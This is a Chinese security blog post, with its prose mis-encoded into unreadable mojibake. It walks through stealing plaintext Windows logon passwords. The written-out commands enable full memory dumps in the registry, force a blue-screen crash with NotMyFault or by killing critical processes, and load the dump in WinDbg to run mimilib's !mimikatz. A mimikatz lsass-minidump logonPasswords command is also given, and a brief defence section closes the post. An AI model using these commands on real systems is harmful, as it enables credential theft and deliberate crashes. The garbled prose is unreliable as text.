I"“5<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>åœ¨ä¸Šç¯‡æ–‡ç« <a href="https://3gstudent.github.io/Mimilib%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">ã€ŠMimilibåˆ©ç”¨åˆ†æã€‹</a>æåˆ°mimilibå¯ä½œä¸ºWinDbgçš„æ’ä»¶è¿›è¡Œä½¿ç”¨ï¼Œæ‰€ä»¥æœ¬æ–‡å°†ä¼šè¯¦ç»†ä»‹ç»è¿™ä¸ªæ’ä»¶çš„ç”¨æ³•ï¼Œå®ç°ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶ä¸­å¯¼å‡ºå£ä»¤ï¼Œç»“åˆåˆ©ç”¨æ€è·¯ç»™å‡ºé˜²å¾¡å»ºè®®</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>dumpæ–‡ä»¶çš„åˆ†ç±»</li>
  <li>ä¸¤ç§dumpæ–‡ä»¶çš„å¯¼å‡ºæ–¹æ³•</li>
  <li>WinDbgç¯å¢ƒé…ç½®</li>
  <li>åˆ©ç”¨æ€è·¯</li>
  <li>é˜²å¾¡å»ºè®®</li>
</ul>

<h2 id="0x02-dumpæ–‡ä»¶çš„åˆ†ç±»">0x02 dumpæ–‡ä»¶çš„åˆ†ç±»</h2>
<hr />

<p>dumpæ–‡ä»¶åˆ†ä¸ºä»¥ä¸‹ä¸¤ç±»ï¼š</p>

<h3 id="1user-mode-dump-file">1.User-Mode Dump File</h3>

<p>å³ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶ï¼Œåˆ†ä¸ºä»¥ä¸‹ä¸¤ç§ï¼š</p>

<ul>
  <li>Full User-Mode Dumps</li>
  <li>Minidumps</li>
</ul>

<p>ç®€å•ç†è§£ï¼šé€šå¸¸æ˜¯é’ˆå¯¹å•ä¸ªè¿›ç¨‹</p>

<p>æ›´å¤šå‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/user-mode-dump-files</p>

<p>åˆ›å»ºæ–¹æ³•ï¼š</p>

<p>å¯ä»¥ä½¿ç”¨Procdumpè¿›è¡Œåˆ›å»º</p>

<p>ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤çš„æ–¹æ³•:</p>

<p>å¯å‚è€ƒä¹‹å‰çš„æ–‡ç« <a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8Elsass.exe%E8%BF%9B%E7%A8%8B%E5%AF%BC%E5%87%BA%E5%87%AD%E6%8D%AE">ã€Šæ¸—é€åŸºç¡€-ä»lsass.exeè¿›ç¨‹å¯¼å‡ºå‡­æ®ã€‹</a></p>

<h3 id="2kernel-mode-dump-files">2.Kernel-Mode Dump Files</h3>

<p>å³å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶ï¼Œåˆ†ä¸ºä»¥ä¸‹äº”ç§ï¼š</p>

<ul>
  <li>Complete Memory Dump</li>
  <li>Kernel Memory Dump</li>
  <li>Small Memory Dump</li>
  <li>Automatic Memory Dump</li>
  <li>Active Memory Dump</li>
</ul>

<p>ç®€å•ç†è§£ï¼šåŒ…æ‹¬æ‰€æœ‰è¿›ç¨‹çš„ä¿¡æ¯</p>

<p>åˆ›å»ºæ–¹æ³•ï¼š</p>

<p>å¯åŠ¨åˆ›å»ºè½¬å‚¨æ–‡ä»¶çš„åŠŸèƒ½ï¼Œåœ¨ç³»ç»Ÿå´©æºƒ(BSOD)æ—¶å°†è‡ªåŠ¨åˆ›å»º</p>

<p>æ›´å¤šå‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/kernel-mode-dump-files</p>

<h2 id="0x03-ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤çš„æ–¹æ³•">0x03 ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤çš„æ–¹æ³•</h2>
<hr />

<p>æµç¨‹å¦‚ä¸‹ï¼š</p>

<p>1.å¼€å¯è½¬å‚¨æ–‡ä»¶çš„åŠŸèƒ½
2.å¼ºåˆ¶ç³»ç»Ÿè“å±(BSOD)ï¼Œç³»ç»Ÿå°†ä¼šè‡ªåŠ¨åˆ›å»ºå†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶
3.ä½¿ç”¨WinDbgåŠ è½½è½¬å‚¨æ–‡ä»¶ï¼Œè°ƒç”¨mimilibå¯¼å‡ºæ˜æ–‡å£ä»¤</p>

<p>å…·ä½“éœ€è¦æ³¨æ„ä»¥ä¸‹é—®é¢˜ï¼š</p>

<h3 id="1å¼€å¯è½¬å‚¨æ–‡ä»¶çš„åŠŸèƒ½">1.å¼€å¯è½¬å‚¨æ–‡ä»¶çš„åŠŸèƒ½</h3>

<p>å¯¹åº”æ³¨å†Œè¡¨ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl</code>ï¼Œæ³¨å†Œè¡¨é¡¹<code class="language-plaintext highlighter-rouge">CrashDumpEnabled</code>ï¼Œç±»å‹ä¸º<code class="language-plaintext highlighter-rouge">REG_DWORD</code></p>

<p>æ•°å€¼å¯¹åº”çš„åŠŸèƒ½å¦‚ä¸‹ï¼š</p>

<ul>
  <li>0è¡¨ç¤ºä¸å¯ç”¨</li>
  <li>1è¡¨ç¤ºå®Œå…¨å†…å­˜è½¬å‚¨</li>
  <li>2è¡¨ç¤ºæ ¸å¿ƒå†…å­˜è½¬å‚¨</li>
  <li>3è¡¨ç¤ºå†…å­˜è½¬å‚¨</li>
</ul>

<p>æŸ¥çœ‹è¿™ä¸ªæ³¨å†Œè¡¨å¯¹åº”çš„cmdå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg query hklm\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled
</code></pre></div></div>

<p>è¿™é‡Œéœ€è¦å°†é”®å€¼è®¾ç½®ä¸º<code class="language-plaintext highlighter-rouge">1</code>ï¼Œå¼€å¯å®Œå…¨å†…å­˜è½¬å‚¨çš„åŠŸèƒ½ï¼Œå¦åˆ™ä½¿ç”¨WinDbgè®¿é—®è¿›ç¨‹lsass.exeçš„å†…å­˜æ—¶ä¼šæç¤ºå…·æœ‰æ— æ•ˆçš„é¡µç›®å½•ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-1.png" alt="Alt text" /></p>

<p>ä¿®æ”¹è¿™ä¸ªæ³¨å†Œè¡¨å¯¹åº”çš„cmdå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hklm\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled /t REG_DWORD /d 1 /f
</code></pre></div></div>

<h3 id="2å¼ºåˆ¶ç³»ç»Ÿè“å±bsod">2.å¼ºåˆ¶ç³»ç»Ÿè“å±(BSOD)</h3>

<h4 id="1é€šè¿‡ç»“æŸå±æ€§ä¸ºcritical-processçš„è¿›ç¨‹å¯¼è‡´bsod">(1)é€šè¿‡ç»“æŸå±æ€§ä¸ºcritical processçš„è¿›ç¨‹å¯¼è‡´BSOD</h4>

<p>é»˜è®¤ä¸ºcritical processçš„ç³»ç»Ÿè¿›ç¨‹å¦‚ä¸‹ï¼š</p>

<ul>
  <li>csrss.exe</li>
  <li>lsass.exe</li>
  <li>services.exe</li>
  <li>smss.exe</li>
  <li>svchost.exe</li>
  <li>wininit.exe</li>
</ul>

<p>è¿™é‡Œä¹Ÿå¯ä»¥å…ˆå°†æŒ‡å®šè¿›ç¨‹è®¾ç½®ä¸ºcritical processï¼Œç»“æŸè¯¥è¿›ç¨‹åä¹Ÿä¼šå¯¼è‡´BSOD</p>

<p>å…·ä½“ç»†èŠ‚å¯å‚è€ƒä¹‹å‰çš„æ–‡ç« <a href="https://3gstudent.github.io/%E7%BB%93%E6%9D%9F%E8%BF%9B%E7%A8%8B%E5%AF%BC%E8%87%B4BSOD%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">ã€Šç»“æŸè¿›ç¨‹å¯¼è‡´BSODçš„åˆ©ç”¨åˆ†æã€‹</a></p>

<h4 id="2ä½¿ç”¨notmyfault">(2)ä½¿ç”¨NotMyFault</h4>

<p>ä¸‹è½½åœ°å€ï¼š</p>

<p>https://docs.microsoft.com/en-us/sysinternals/downloads/notmyfault</p>

<p>è§¦å‘è“å±(BSOD)çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>notmyfault.exe -accepteula /crash
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>NotMyFaultè¿˜æ”¯æŒå°†å½“å‰ç³»ç»ŸæŒ‚èµ·ï¼Œå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>notmyfault.exe -accepteula /hang
</code></pre></div></div>

<p>é»˜è®¤é…ç½®ä¸‹ï¼Œç³»ç»Ÿè“å±(BSOD)åå°†ä¼šè‡ªåŠ¨é‡å¯å¹¶ç”Ÿæˆæ–‡ä»¶<code class="language-plaintext highlighter-rouge">c:\windows\MEMORY.DMP</code></p>

<h3 id="3ä½¿ç”¨windbgåŠ è½½memorydmp">3.ä½¿ç”¨WinDbgåŠ è½½MEMORY.DMP</h3>

<p><strong>æ³¨ï¼š</strong></p>

<p>WinDbgå¯ä»¥åœ¨å®‰è£…SDKåè‡ªåŠ¨å®‰è£…</p>

<p>å‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools</p>

<p>ä½¿ç”¨WinDbgï¼Œé€‰æ‹©æ‰“å¼€<code class="language-plaintext highlighter-rouge">Crash Dump</code>ï¼Œé€‰æ‹©MEMORY.DMP</p>

<p>è·å¾—dumpæ–‡ä»¶è¯¦ç»†ä¿¡æ¯çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!analyze -v
</code></pre></div></div>

<p>æŠ¥é”™æç¤ºï¼š<code class="language-plaintext highlighter-rouge">Kernel symbols are WRONG. Please fix symbols to do analysis.</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-2.png" alt="Alt text" /></p>

<p>è¿™é‡Œéœ€è¦ä¿®å¤ç¬¦å·æ–‡ä»¶ï¼Œå¯ä»¥é€‰æ‹©ä»¥ä¸‹ä¸‰ç§è§£å†³æ–¹æ³•ï¼š</p>

<h3 id="1-using-the-_nt_symbol_path-environment-variable">(1) using the _NT_SYMBOL_PATH environment variable.</h3>

<p>æ·»åŠ ç¯å¢ƒå˜é‡ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set _NT_SYMBOL_PATH=srv*c:\mysymbol*https://msdl.microsoft.com/download/symbols
</code></pre></div></div>

<h3 id="2-using-the--y--argument-when-starting-the-debugger">(2) using the -y <symbol_path> argument when starting the debugger.</symbol_path></h3>

<p>ä½¿ç”¨WinDbgä»¥æŒ‡å®šå‚æ•°å¯åŠ¨</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>windbg.exe -y SRV*c:\mysymbol*http://msdl.microsoft.com/download/symbols
</code></pre></div></div>

<h3 id="3using-sympath-and-sympath">(3)using .sympath and .sympath+</h3>

<p>æ·»åŠ <code class="language-plaintext highlighter-rouge">Symbol File Path</code></p>

<p>WinDbgçš„å‘½ä»¤è¡Œæ“ä½œï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.sympath SRV*c:\mysymbol*http://msdl.microsoft.com/download/symbols
</code></pre></div></div>

<p>ä¹Ÿå¯ä»¥é€šè¿‡ç•Œé¢æ“ä½œå®ç°</p>

<p><code class="language-plaintext highlighter-rouge">File</code>-&gt;<code class="language-plaintext highlighter-rouge">Symbol File Path ...</code></p>

<p>å¡«å…¥<code class="language-plaintext highlighter-rouge">SRV*c:\mysymbol*http://msdl.microsoft.com/download/symbols</code></p>

<p>è®¾ç½®ä»¥åï¼Œéœ€è¦çš„ç¬¦å·æ–‡ä»¶ä¼šè‡ªåŠ¨ä»Microsoftå…¬å…±ç¬¦å·æœåŠ¡å™¨ä¸‹è½½</p>

<p>é‡æ–°åŠ è½½ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.Reload
</code></pre></div></div>

<p>æµ‹è¯•ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!process 0 0 lsass.exe
</code></pre></div></div>

<p>åŠ è½½æ­£å¸¸ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-3.png" alt="Alt text" /></p>

<p>å¦‚æœè¿™éƒ¨åˆ†ä»ç„¶å¤±è´¥ï¼Œå¯å°è¯•ä½¿ç”¨VPNè¿æ¥äº’è”ç½‘</p>

<p>å¦‚æœæµ‹è¯•ç¯å¢ƒæ— æ³•è¿æ¥äº’è”ç½‘ï¼Œå¯ä»¥é€šè¿‡SymChkè·å–æ¸…å•æ–‡ä»¶çš„æ–¹å¼ä¸‹è½½ç¬¦å·æ–‡ä»¶</p>

<p>å‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/using-a-manifest-file-with-symchk</p>

<p>åœ¨æ— æ³•è¿æ¥äº’è”ç½‘çš„è®¡ç®—æœºAä¸Šæ‰§è¡Œï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SymChk /om c:\Manifest\man.txt /id c:\test\MEMORY.DMP
</code></pre></div></div>

<p>è·å¾—æ–‡ä»¶<code class="language-plaintext highlighter-rouge">c:\Manifest\man.txt</code>ï¼Œå°†å…¶å¤åˆ¶åˆ°å¯è¿æ¥äº’è”ç½‘çš„è®¡ç®—æœºBä¸Šï¼Œåœ¨è®¡ç®—æœºBä¸Šæ‰§è¡Œå¦‚ä¸‹å‘½ä»¤ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SymChk /im c:\test\man.txt /s srv*c:\mysymbolNew*https://msdl.microsoft.com/download/symbols
</code></pre></div></div>

<p>å°†ä¼šç”Ÿæˆæ–°çš„æ–‡ä»¶å¤¹<code class="language-plaintext highlighter-rouge">c:\mysymbolNew</code>ï¼Œå°†å…¶å¤åˆ¶åˆ°è®¡ç®—æœºAä¸Šï¼Œåœ¨è®¡ç®—æœºAä¸Šå¯åŠ¨WinDbgå¹¶æŒ‡å®šæ–°çš„ç¬¦å·æ–‡ä»¶ä½ç½®ä¸º<code class="language-plaintext highlighter-rouge">c:\mysymbolNew</code>ï¼Œå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.symfix c:\mysymbolNew
</code></pre></div></div>

<p>æµ‹è¯•ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.Reload
!process 0 0 lsass.exe
</code></pre></div></div>

<p>åŠ è½½æ­£å¸¸ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-6.png" alt="Alt text" /></p>

<h3 id="4åŠ è½½mimilibæ’ä»¶">4.åŠ è½½mimilibæ’ä»¶</h3>

<p>å¯å‚è€ƒä¹‹å‰çš„æ–‡ç« <a href="https://3gstudent.github.io/Mimilib%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">ã€ŠMimilibåˆ©ç”¨åˆ†æã€‹</a></p>

<h3 id="1æ–¹æ³•1">(1)æ–¹æ³•1</h3>

<p>å°†mimilib.dllä¿å­˜è‡³WinDbgçš„winextç›®å½•</p>

<p>æˆ‘çš„æµ‹è¯•ç¯å¢ƒ(Server2012R2x64)ä¿å­˜çš„è·¯å¾„ä¸ºï¼š<code class="language-plaintext highlighter-rouge">C:\Program Files\Debugging Tools for Windows (x64)\winext</code></p>

<p>å¯åŠ¨WinDbg</p>

<p>åŠ è½½æ’ä»¶çš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.load mimilib
</code></pre></div></div>

<h3 id="2æ–¹æ³•2">(2)æ–¹æ³•2</h3>

<p>ç›´æ¥åŠ è½½mimilibçš„ç»å¯¹è·¯å¾„ï¼Œå®ä¾‹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.load c:\test\mimilib
</code></pre></div></div>

<p>ç»¼ä¸Šï¼Œæ­å»ºé…ç½®ç¯å¢ƒå¯¼å‡ºå£ä»¤çš„å®Œæ•´å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.sympath SRV*c:\mysymbol*http://msdl.microsoft.com/download/symbols
.reload
!process 0 0 lsass.exe
.process 890f4530
.load c:\test\mimilib
.reload
!mimikatz
</code></pre></div></div>

<p>å®Œæ•´æµç¨‹å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-4.png" alt="Alt text" /></p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2020-3-27/2-5.png" alt="Alt text" /></p>

<p>å°†è¾“å‡ºç»“æœä¿å­˜åˆ°æ–‡ä»¶ä¸­å¯ä½¿ç”¨ä»¥ä¸‹å‘½ä»¤ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.logopen c:\test\log.txt
!mimikatz
.logclose
</code></pre></div></div>

<h2 id="0x04-åˆ©ç”¨æ€è·¯">0x04 åˆ©ç”¨æ€è·¯</h2>
<hr />

<h3 id="1ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤">1.ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤</h3>

<p>é€šè¿‡API <code class="language-plaintext highlighter-rouge">MiniDumpWriteDump()</code>è·å¾—è¿›ç¨‹lsass.exeçš„dumpæ–‡ä»¶</p>

<p>ä½¿ç”¨mimikatzä»dumpæ–‡ä»¶ä¸­å¯¼å‡ºå£ä»¤ï¼Œå‘½ä»¤å¦‚ä¸‹:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
</code></pre></div></div>

<h3 id="2ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤">2.ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤</h3>

<p>å¼€å¯è½¬å‚¨æ–‡ä»¶çš„åŠŸèƒ½</p>

<p>å¼ºåˆ¶ç³»ç»Ÿè“å±(BSOD)</p>

<p>ä½¿ç”¨WinDbgåŠ è½½è½¬å‚¨æ–‡ä»¶ï¼Œè°ƒç”¨mimilibå¯¼å‡ºæ˜æ–‡å£ä»¤</p>

<h2 id="0x05-é˜²å¾¡å»ºè®®">0x05 é˜²å¾¡å»ºè®®</h2>
<hr />

<h3 id="1ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤-1">1.ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤</h3>

<p>æ‹¦æˆªAPI <code class="language-plaintext highlighter-rouge">MiniDumpWriteDump()</code>çš„è¡Œä¸ºï¼Œéƒ¨åˆ†å®‰å…¨äº§å“å·²ç»æ”¯æŒè¿™ä¸ªåŠŸèƒ½</p>

<h3 id="2ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤-1">2.ä»å†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤</h3>

<p>å¼€å¯è½¬å‚¨åŠ å¯†åŠŸèƒ½</p>

<p>å‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/about-dump-encryption</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>å¦‚æœæ”»å‡»è€…è·å¾—äº†ç³»ç»Ÿçš„ç®¡ç†å‘˜æƒé™ï¼Œèƒ½å¤Ÿå…³é—­è½¬å‚¨åŠ å¯†çš„åŠŸèƒ½</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡åˆ†åˆ«ä»‹ç»äº†ä»ç”¨æˆ·æ¨¡å¼è½¬å‚¨æ–‡ä»¶å’Œå†…æ ¸æ¨¡å¼è½¬å‚¨æ–‡ä»¶å¯¼å‡ºå£ä»¤çš„æ–¹æ³•ï¼Œç»“åˆåˆ©ç”¨æ€è·¯ç»™å‡ºé˜²å¾¡å»ºè®®</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET